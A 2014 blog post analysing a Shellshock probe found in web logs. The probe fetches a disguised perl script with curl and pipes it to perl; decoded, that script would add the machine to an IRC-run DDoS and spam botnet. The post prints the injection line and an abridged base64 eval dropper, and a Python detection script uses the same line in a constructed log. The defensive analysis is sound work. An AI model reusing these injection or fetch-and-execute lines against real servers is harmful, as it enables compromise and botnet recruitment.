Tuesday, November 4, 2014

Aaaannddd we're back... ShellShock Payload analysis

    Wow, it's been a while, let's jump in. Okay, here's a bit of information on Shellshock. It's a vulnerability in a Linux shell called bash, estimated to have affected roughly seventy percent of the internet. It affected Unix-like systems including, but not limited to, Android, OS X, and Linux. Shellshock allows an attacker to execute code on a vulnerable target machine. A Shellshock exploit generally looks something like this: "() { :; }; echo 'Shellshock vulnerable'". The "() { :; }" part is a bash function definition; a vulnerable bash keeps parsing past it and runs whatever follows the closing semicolon, so this would let an attacker print "Shellshock vulnerable" to the console. Of course, this is just an example and isn't really dangerous. Let's look at something a bit more realistic.

    I'm working on a website and, like many other admins, I have found some very interesting data in our logs. Please note that by executing any of the code I mention or link past this point, you'll most likely damage your computer, possibly irreversibly. With that disclaimer out of the way, let's get to the fun stuff. As I was looking through my logs for Shellshock attempts, one in particular caught my eye. The attacker attempted to send me the following payload:

() { :; }; curl http://***.***.***.***/index.png | perl
I decided it would be interesting to look at this "image", since most images are not executable through perl. After loading the image into a text editor, my suspicion that it was really a script was confirmed. I found the following inside the "image" (abridged so as not to fill the page):
#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('I3lvdSBnb3Qgc2hl...DQo='));
This code takes a base64-encoded string, decodes it, and executes the result with eval. The source code is obfuscated using base64, but base64 is an encoding, not encryption, so it is easily decodable. I decoded the base64 and was pleased to find that the resulting source code was easily readable. The gist of the code was that it adds the infected machine to a DDoS and spam-email botnet controlled over IRC. As you can see by looking at the source (again, don't run it), the botnet is run by the users "M", "st0n3d", "x00" and "Jorgee". Judging by the nice, ASCII-art-filled interface, I'm guessing they plan on selling their botnet. This attack was pretty well masked, though the server in question was already patched for Shellshock. Nice try though!
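As an added example (not code from the original post), here is a small Python triage script that flags Shellshock probes in access-log lines and statically peels the eval(decode_base64('...')) wrapping described above, so the inner source can be read without ever running it. The log lines, IP addresses and dropper are all constructed for the example.

```python
"""Triage helpers for Shellshock-style payloads found in web server logs.
Added example; all inputs below are constructed (IPs from RFC 5737 ranges)."""
import base64
import re

# CVE-2014-6271 probe: a bash function body "() { ... };" with commands
# trailing it, which a vulnerable bash runs while importing the variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
# The dropper shape from the post: eval(decode_base64('...'))
B64_EVAL_RE = re.compile(
    r"decode_base64\(\s*['\"](?P<blob>[A-Za-z0-9+/=\s]+)['\"]\s*\)")


def find_shellshock_attempts(log_text):
    """Return (line_no, trailing_command) for each line carrying a probe."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = SHELLSHOCK_RE.search(line)
        if m:
            hits.append((n, m.group("cmd").rstrip('"')))
    return hits


def unwrap_base64_eval(perl_src, max_layers=5):
    """Peel eval(decode_base64(...)) layers statically; nothing is executed.
    Returns (layers_peeled, innermost_source)."""
    src = perl_src
    for peeled in range(max_layers):
        m = B64_EVAL_RE.search(src)
        if not m:
            return peeled, src
        blob = re.sub(r"\s+", "", m.group("blob"))  # tolerate wrapped blobs
        src = base64.b64decode(blob).decode("utf-8", errors="replace")
    return max_layers, src  # still wrapped after max_layers: stop here


# Constructed sample log: one probe carrying the curl-pipe-perl dropper.
SAMPLE_LOG = (
    '198.51.100.7 - - [04/Nov/2014:10:00:01 +0000] "GET /cgi-bin/test HTTP/1.1" '
    '200 12 "-" "() { :; }; curl http://203.0.113.5/index.png | perl"\n'
    '198.51.100.8 - - [04/Nov/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" '
    '200 4096 "-" "Mozilla/5.0"\n'
)

def _wrap(src):
    """Build one eval(decode_base64('...')) layer around src (constructed)."""
    return "eval(decode_base64('%s'));\n" % base64.b64encode(src.encode()).decode()

# Inert inner "payload", wrapped twice to show that layered droppers peel too.
INNER = "# constructed inert payload\nprint \"hello\";\n"
SAMPLE_DROPPER = "#!/usr/bin/perl\nuse MIME::Base64;\n" + _wrap(_wrap(INNER))
```

Calling find_shellshock_attempts(SAMPLE_LOG) reports line 1 with the curl-pipe-perl command, and unwrap_base64_eval(SAMPLE_DROPPER) returns 2 peeled layers and the inert inner source.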